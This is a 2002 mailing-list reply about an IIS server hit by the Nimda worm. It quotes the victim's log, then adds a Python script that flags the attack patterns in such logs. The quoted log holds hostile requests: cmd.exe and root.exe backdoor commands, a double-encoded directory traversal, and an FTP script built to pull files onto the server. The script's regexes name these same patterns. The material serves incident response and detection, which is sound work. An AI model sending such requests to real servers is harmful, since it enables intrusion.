NIMDA Worm?

http://www.incidents.org/react/nimda.pdf

Should be the attacking system's IP, but probably not the originator of the attack.

On Tue, 26 Feb 2002 15:51:44 -0500
"GP" <[EMAIL PROTECTED]> wrote:

> Help,   I recently found this on my IIS server after being contacted
> that my webserver attempted to scan someone's machine on port 80.  I've
> looked on my web box and found the following files were installed
> msxc32.exe which seems to be Mirc program which is some type of chat
> program.  I've talked to other techs here who have not installed this
> program.  I've traced the following ip addresses back to the domain
> admins but before I contact I need to know if this is the intruder's ip
> address and what would be the best course of action. On the flip side
> what do I need to do to prevent this from happening in the future?  I
> have since blocked these addresses but this is only a temp fix.
> 
> 18:56:21 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+shouldNT32.ocx+c:shouldNT32.ocx>>xl32.scr 502
> 18:56:23 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+echo+get+shtlng32.dll+c:shtlng32.dll>>xl32.scr 502
> 18:56:25 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+smba.dll+c:smba.dll>>xl32.scr 502
> 18:56:27 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+echo+get+sndrec32.dl_+c:sndrec32.dl_>>xl32.scr 502
> 18:56:33 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+thds32.exe+c:thds32.exe>>xl32.scr 502
> 18:56:35 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+echo+get+winsd32.ocx+c:winsd32.ocx>>xl32.scr 502
> 18:56:37 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+holes.txt+c:holes.txt>>xl32.scr 502
> 18:56:39 156.63.205.47 GET /iisadmpwd/fuck.exe?/c+echo+bye>>xl32.scr 502
> 18:56:54 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+ftp+-s:xl32.scr+-n+-d 502
> 20:20:36 216.158.145.245 GET /scripts/root.exe?/c+dir 404
> 20:20:36 216.158.145.245 GET /MSADC/root.exe?/c+dir 404
> 20:20:36 216.158.145.245 GET /c/winnt/system32/cmd.exe?/c+dir 404
> 20:20:36 216.158.145.245 GET /d/winnt/system32/cmd.exe?/c+dir 404
> 20:20:36 216.158.145.245 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404
> 20:20:36 216.158.145.245 GET
> 
> 


Mark Robinson
<[EMAIL PROTECTED]>
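One way to triage an IIS log excerpt like the one quoted above, as an added example that is not part of this thread: it tags each request with the request shapes visible in the post (root.exe/cmd.exe probes, double-encoded traversal, the iisadmpwd FTP-script drop) and tallies them per source IP, noting whether any hit actually got a 2xx. The log lines, addresses (RFC 5737 ranges) and signature names are constructed for this example.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in the same "time ip method uri status" shape as the
# quoted IIS log; the requests and addresses are not taken from the post.
SAMPLE_LOG = """\
20:20:36 192.0.2.10 GET /scripts/root.exe?/c+dir 404
20:20:36 192.0.2.10 GET /MSADC/root.exe?/c+dir 404
20:20:36 192.0.2.10 GET /c/winnt/system32/cmd.exe?/c+dir 404
20:20:37 192.0.2.10 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404
18:56:21 198.51.100.7 GET /iisadmpwd/x.exe?/c+echo+get+a.ocx+c:a.ocx>>xl32.scr 502
18:56:54 198.51.100.7 GET /iisadmpwd/x.exe?/c+ftp+-s:xl32.scr+-n+-d 502
20:25:10 203.0.113.5 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 200
20:21:00 203.0.113.9 GET /index.html 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")

# Detection signatures, derived from the request shapes quoted in the post.
SIGNATURES = [
    ("traversal", re.compile(r"\.\.%", re.I)),                      # ..%255c..
    ("backdoor", re.compile(r"/(root|cmd)\.exe\?/c\+", re.I)),      # root.exe / cmd.exe ?/c+
    ("ftp-script", re.compile(r"/iisadmpwd/.*(>>\S+\.scr|ftp\+-s:)", re.I)),
]

def classify(uri):
    """Return the first matching signature name, or None for a clean request."""
    for name, pat in SIGNATURES:
        if pat.search(uri):
            return name
    return None

def summarize(log_text):
    """Per source IP: hit counts per signature, and whether any hit returned 2xx.

    A 404/502 means the probed backdoor was not present; a 2xx on one of these
    requests is the line that deserves incident handling, not just a block."""
    report = defaultdict(lambda: {"hits": Counter(), "succeeded": False})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip anything that is not a five-field log line
        _, ip, _, uri, status = m.groups()
        tag = classify(uri)
        if tag is None:
            continue
        report[ip]["hits"][tag] += 1
        if status.startswith("2"):
            report[ip]["succeeded"] = True
    return dict(report)
```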



